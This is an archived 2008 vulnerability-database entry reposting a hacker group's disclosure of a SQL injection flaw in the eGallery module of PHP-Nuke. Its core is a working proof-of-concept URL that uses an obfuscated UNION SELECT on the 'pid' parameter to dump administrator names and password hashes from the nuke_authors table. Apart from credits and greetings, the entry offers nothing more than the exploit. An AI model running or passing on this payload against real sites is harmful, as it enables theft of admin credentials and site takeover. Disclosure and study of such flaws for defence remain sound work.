Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19336
HistoryMar 04, 2008 - 12:00 a.m.

PHP-Nuke Module eGallery "pid" Remote SQL Injection

2008-03-0400:00:00
vulners.com
26

Aria-Security Team (Persian Security Network)
http://Aria-Security.net

Shoutz: AurA, NULL, imm02tal, Kinglet,
PHP-Nuke Module eGallery "pid" Remote SQL Injection

http://forum.aria-security.net/showthread.php?p=1548

PoC
modules.php?name=eGallery&file=index&op=showpic&pi
d=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect//0,aid,pwd,pwd,4//from+nuke_authors/*where%20admin%201%200%202

Regards,
The-0utl4w
(credits goes to aria-security team)